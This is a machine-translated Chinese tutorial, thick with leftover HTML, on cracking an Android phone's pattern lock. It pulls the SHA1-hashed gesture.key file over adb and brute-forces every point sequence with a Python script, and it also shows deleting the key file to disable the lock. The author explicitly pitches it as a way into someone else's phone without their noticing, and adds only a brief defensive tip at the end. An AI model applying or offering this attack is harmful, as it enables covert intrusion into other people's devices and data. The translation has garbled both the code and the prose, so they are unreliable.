How to hack the graphics lock on your Android phone (ix Gongge)

<span id="Label3"></p><span style="font-size: 14px; line-height: 1.5;"><span style="font-size: 14px; line-height: 1.5;">http://mobile.51cto.com/iphone-441496.htm</span></span><p><p>The Android Phone's graphics lock (nine Gongge) is a 3x3 lattice that connects several points sequentially to Lock/unlock Functionality. A minimum of 4 points is required to connect up to 9 Points. The internet also has the method of violence to delete the phone graphics lock, that is, directly kill the graphics lock Function. But if you want to get into someone else's cell phone, but don't want to be alert ... You can refer to this article for a moment.</p></p><p><p></p></p><p><p>Prerequisites: the phone needs root, and the debug mode is turned On. Generally speaking, if the use of such as "pea pod phone helper", "360 mobile phone assistant" type of software, will be asked to open the debug mode. If you want to delete your Phone's built-in software, you'll need to have your phone Root.</p></p><p><p><strong>Principle Analysis</strong></p></p><p><p>First of all, how does Android phone mark these 9 points? By reading the Android system source, each point has its number, forming a 3x3 matrix, such as:</p></p><p><p>00 01 02</p></p><p><p>03 04 05</p></p><p><p>06 07 08</p></p><p><p>If you set the unlock shape to an "L" shape,</p></p><p><p></p></p><p><p>So the order of the points is this: 00 03 06 07 08. The system will write down this string of numbers, and then this string of numbers (in 16 binary way) for SHA1 encryption, stored in the Phone's/data/system/gesture.key file. We connect the phone and the computer with the data cable, then the ADB connects the phone and downloads the file to the computer (command: adb pull/data/system/gesture.key gesture.key),</p></p><p><p></p></p><p><p>With Winhex and other hexadecimal editing programs to open gesture.key, you will find the file is SHA1 encrypted string: c8c0b24a15dc8bbfd411427973574695230458f0,</p></p><p><p></p></p><p><p>When you unlock the next time, the system compares the pattern you draw, see the corresponding number string is not 0003060708 corresponding encryption Results. If it is, unlock it, or remain locked. so, If all the numbers are poor, how much will it be? Lenovo to the high school factorial, if 4 points to do unlock graphics, is the 9x8x7x6=3024 kind of possibility, that 5 points is 15120, 6 points of 60480, 7 points 181440, 8 points 362880, 9 Points 362880. There are 985824 possibilities in total (but this is not strictly calculated because the points on the same line can only be connected to their adjacent points).</p></p><p><p>uttered, there are less than 985824 possibilities. At first glance it is very big, but in front of the computer, poor to cite these things in a few seconds.</p></p><p><p><strong>Cracking process</strong></p></p><p><p>When you know the principle, start writing programs to achieve it. Python is used here to complete the Task. The main applications are HASHLIB modules (SHA1 encryption of Strings) and Itertools modules (python built-in, generating 00-09 permutation combinations).</p></p><p><p>The main processes Are:</p></p><p><p>1.ADB Connect phone, Get Gesture.key file</p></p><p><p>2. Read the key file and deposit the string str_a</p></p><p><p>3. Generate all possible digital strings</p></p><p><p>4. Encrypt these number strings to get the string str_b</p></p><p><p>5. Compare String str_a to Str_b</p></p><p><p>6. If the string B is the same, the number string num is the desired unlock order</p></p><p><p>7. Print out the digital string num</p></p><p><p>Here is the program:</p></p><pre class="prettyprint lang-python prettyprinted"><span class="com">#-*-coding:cp936-*-<span class="kwd">Import<span class="pln">Itertools<span class="kwd">Import<span class="pln">Hashlib<span class="kwd">Import<span class="pln">Time<span class="kwd">Import<span class="pln">Os<span class="com">#调用cmd, ADB connects to the phone, reads SHA1 encrypted string<span class="pln">Os<span class="pun">.<span class="pln">System<span class="pun">(<span class="str">"ADB Pull/data/system/gesture.key gesture.key"<span class="pun">)<span class="pln">Time<span class="pun">.<span class="pln">Sleep<span class="pun">(<span class="lit">5<span class="pun">)<span class="pln">F<span class="pun">=<span class="pln">Open<span class="pun">(<span class="str">' Gesture.key '<span class="pun">,<span class="str">' R '<span class="pun">)<span class="pln">pswd<span class="pun">=<span class="pln">F<span class="pun">.<span class="pln">ReadLine<span class="pun">()<span class="pln">F<span class="pun">.<span class="pln">Close<span class="pun">()<span class="pln">Pswd_hex<span class="pun">=<span class="pln">pswd<span class="pun">.<span class="pln">Encode<span class="pun">(<span class="str">' Hex '<span class="pun">)<span class="kwd">Print<span class="pln"> <span class="str">' Encrypted password:%s '<span class="pun">%<span class="pln">Pswd_hex<span class="com">#生成解锁序列, get [' 00 ', ' 01 ', ' 02 ', ' 03 ', ' 04 ', ' 05 ', ' 06 ', ' 07 ', ' 08 ']<span class="pln">Matrix<span class="pun">=[]<span class="pln"><span class="kwd">For<span class="pln">I<span class="kwd">Inch<span class="pln">Range<span class="pun">(<span class="lit">0<span class="pun">,<span class="lit">9<span class="pun">):<span class="pln">Str_temp<span class="pun">=<span class="pln"><span class="str">' 0 '<span class="pun">+<span class="pln">Str<span class="pun">(<span class="pln">I<span class="pun">)<span class="pln">Matrix<span class="pun">.<span class="pln">Append<span class="pun">(<span class="pln">Str_temp<span class="pun">)<span class="com">Arrange #将00--08 characters, at least 4 numbers, up to a maximum of all permutations<span class="pln">Min_num<span class="pun">=<span class="lit">4<span class="pln">Max_num<span class="pun">=<span class="pln">Len<span class="pun">(<span class="pln">Matrix<span class="pun">)<span class="kwd">For<span class="pln">Num<span class="kwd">Inch<span class="pln">Range<span class="pun">(<span class="pln">Min_num<span class="pun">,<span class="pln">Max_num<span class="pun">+<span class="lit">1<span class="pun">): #从<span class="lit">04<span class="pln"><span class="pun">-<span class="pln"><span class="lit">08<span class="pln">Iter1<span class="pun">=<span class="pln">Itertools<span class="pun">.<span class="pln">Permutations<span class="pun">(<span class="pln">Matrix<span class="pun">,<span class="pln">Num<span class="pun">) #从<span class="lit">9<span class="pun">To pick out a number.<span class="pln">N<span class="pun">To arrange<span class="pln">List_m<span class="pun">=[]<span class="pln">List_m<span class="pun">.<span class="pln">Append<span class="pun">(<span class="pln">List<span class="pun">(<span class="pln">Iter1<span class="pun">)) #将生成的排列全部存放到<span class="pln">List_m<span class="pun">In the list<span class="pln"><span class="kwd">For<span class="pln">El<span class="kwd">Inch<span class="pln">List_m<span class="pun">[<span class="lit">0<span class="pun">]: #遍历这<span class="pln">N<span class="pun">All permutations of a number of words<span class="pln">Strlist<span class="pun">=<span class="str">‘‘<span class="pun">.<span class="pln">Join<span class="pun">(<span class="pln">El<span class="pun">) #将<span class="pln">List<span class="pun">Converted Into<span class="pln">Str<span class="pun">。 [<span class="lit">00<span class="pun">,<span class="lit">03<span class="pun">,<span class="lit">06<span class="pun">,<span class="lit">07<span class="pun">,<span class="lit">08<span class="pun">]--><span class="lit">0003060708<span class="pln">Strlist_sha1<span class="pun"><span class="pun">=<span class="pln"> hashlib<span class="pun">. <span class="pln"> SHA1<span class="pun">(<span class="pln">strlist<span class="pun">. <span class="pln"> Decode<span class="pun">(<span class="str">' hex '<span class="pun">)). <span class="pln"> Hexdigest<span class="pun">() #将字符串进行<span class="pln">SHA1 <span class="pun">encryption <span class="pln"> <span class="kwd">if<span class="pln"> pswd_hex<span class="pun">= =<span class="pln">strlist_sha1<span class="pun">: # Compare the string in the phone file with the encrypted string <span class="pln"> <span class="kwd">print<span class="pln"> <span class="str">' unlock password: '<span class="pun">,<span class="pln">strlist</span></span></span></span></span></span> <!-- c20--> </span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></pre><p><p><strong>Summarize</strong></p></p><p><p>From the program itself, the unlock password should be broken out of the loop and terminate the program Run. But Python does not jump out of multiple loops of the statement, if you want to jump out of multiple loops, can only set the flag bit and then continue to Determine. This step of "jumping out of the loop" is omitted for running Speed. (is there a better way to jump out of multiple loops?) Many fault-tolerant statements are also omitted. For the purpose of cracking, if you simply forget your phone graphics lock password, can be used in a simpler way: adb connect the phone, and then "adb rm/data/system/gesture.key" Delete the Gesture.key file, at this time the graphics lock is invalid, at will be able to draw a bit can unlock. But this article begins with the assumption that "to get into someone's cell phone without being noticed", This article has been Written.</p></p><p><p>finally, a security tip: if the phone is rooted, but also to use "XX mobile phone assistant", but also want to set the graphics lock-in the phone "settings" option, there is a "lock state to cancel the USB debugging mode" (this name is different from the phone, and some have this option, some phones do not), after the function , it is possible to guard against such attacks in the presence of a mobile phone lock. The technical principle of this article is very simple, but also hope that you greatly teach some tall Python programming skills.</p></p><p><p>How to hack the graphics lock on your Android phone (ix Gongge)</p></p></span>